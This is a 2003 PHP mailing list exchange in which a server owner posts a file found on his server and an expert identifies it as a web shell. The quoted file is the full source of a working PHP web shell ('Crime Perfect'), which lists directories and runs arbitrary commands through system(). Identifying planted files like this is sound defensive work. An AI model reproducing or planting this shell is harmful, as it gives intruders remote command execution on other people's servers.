Looks like it is a PHP script to give people shell access as the web
server user.
On Thu, 2003-07-31 at 02:06, Joe Harman wrote:
> I found this on my server... I have no idea what it is... can someone
> tell me what it does...
>
>
>
> Thanks
>
>
>
> ----------------------------------------------
>
>
>
> <html> <head>
>
> <title>PHP Shell - CP</title>
>
> </head>
>
> <body bgcolor="#FFFFFF" text="#333333" link="#000000" vlink="#000000"
> alink="#000000">
>
> <h1 align="center"><font size="+4" face="verdana">Crime
> Perfect</font><br>
>
> <font face="Tahoma" size="+1">PHP Shell - by _m4st3r_c0d3</font></h1>
>
> <?php
>
> /* First we check if there has been asked for a working directory. */
>
> if (isset($work_dir)) {
>
> /* A workdir has been asked for - we chdir to that dir. */
>
> chdir($work_dir);
>
> $work_dir = exec("pwd");
>
> } else {
>
> /* No work_dir - we chdir to $DOCUMENT_ROOT */
>
> chdir($DOCUMENT_ROOT);
>
> $work_dir = $DOCUMENT_ROOT;
>
> }
>
> ?>
>
> <form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
>
> <p><b>Diretório em que você está no momento:
>
> <?php
>
> $work_dir_splitted = explode("/", substr($work_dir, 1));
>
> echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" .
> urlencode($command) . "\">Root</a>/";
>
> if ($work_dir_splitted[0] == "") {
>
> $work_dir = "/"; /* Root directory. */
>
> } else {
>
> for ($i = 0; $i < count($work_dir_splitted); $i++) {
>
> /* echo "i = $i";*/
>
> $url .= "/".$work_dir_splitted[$i];
>
> echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" .
> urlencode($command) . "\">$work_dir_splitted[$i]</a>/";
>
> }
>
> }
>
> ?>
>
> </b></p>
>
> <p><b>Escolha abaixo o diretório em que deseja ir:</b></p>
>
> <select name="work_dir" onChange="this.form.submit()">
>
> <?php
>
> /* Now we make a list of the directories. */
>
> $dir_handle = opendir($work_dir);
>
> /* Run through all the files and directories to find the dirs. */
>
> while ($dir = readdir($dir_handle)) {
>
> if (is_dir($dir)) {
>
> if ($dir == ".") {
>
> echo "<option value=\"$work_dir\" selected>Current
> Directory</option>\n";
>
> } elseif ($dir == "..") {
>
> /* We have found the parent dir. We must be carefull if the parent
>
> directory is the root directory (/). */
>
> if (strlen($work_dir) == 1) {
>
> /* work_dir is only 1 charecter - it can only be / */
>
> } elseif (strrpos($work_dir, "/") == 0) {
>
> /* The last / in work_dir were the first charecter.
>
> This means that we have a top-level directory
>
> eg. /bin or /home etc... */
>
> echo "<option value=\"/\">Parent Directory</option>\n";
>
> } else {
>
> /* We do a little bit of string-manipulation to find the parent
>
> directory... Trust me - it works :-) */
>
> echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"),
> 1)) ."\">Parent Directory</option>\n";
>
> }
>
> } else {
>
> if ($work_dir == "/") {
>
> echo "<option value=\"$work_dir$dir\">$dir</option>\n";
>
> } else {
>
> echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
>
> }
>
> }
>
> }
>
> }
>
> closedir($dir_handle);
>
> ?>
>
> </select>
>
> <p><b>Digite abaixo os comandos que deseja executar:</b></p>
>
> <input type="text" name="command" size="60" <?php if ($command) { echo
> "value=\"$command\"";} ?> > <input name="submit_btn" type="submit"
> value="Execute Command"></p>
>
> <p>Ligar/Ativar <code>stderr</code>-trapping?
>
> <input type="checkbox" name="stderr"></p>
>
> <p><b>Abaixo, terminal onde aparecerá os resultados dos comandos
> que
>
> você executou</b></p>
>
> <p>
>
> <textarea cols="80" rows="20" readonly>
>
> <?php
>
> if ($command) {
>
> if ($stderr) {
>
> system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm
> /tmp/output.txt");
>
> } else {
>
> system($command);
>
> }
>
> }
>
> ?>
>
> </textarea>
>
> </p>
>
> </form>
>
>
>
> <p><b>Crime Perfect 2003 </b></p>
>
> <p><b>By _m4st3r_c0d3 - #crimeperfect</b></p>
>
> </div>
>
> </body>
>
> </html>
>
>
>
>
> Joe Harman
>
> http://www.HarmanMedia.com
>
> Only two things are infinite, the universe and human stupidity, and I'm
> not sure about the former. - Albert Einstein
>
--
-~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~-
John Coggeshall http://www.coggeshall.org/
john at coggeshall dot org
The PHP Developer's Handbook
The definitive PHP5 developer's guide http://www.php-handbook.com/
-~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~--~=~-
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
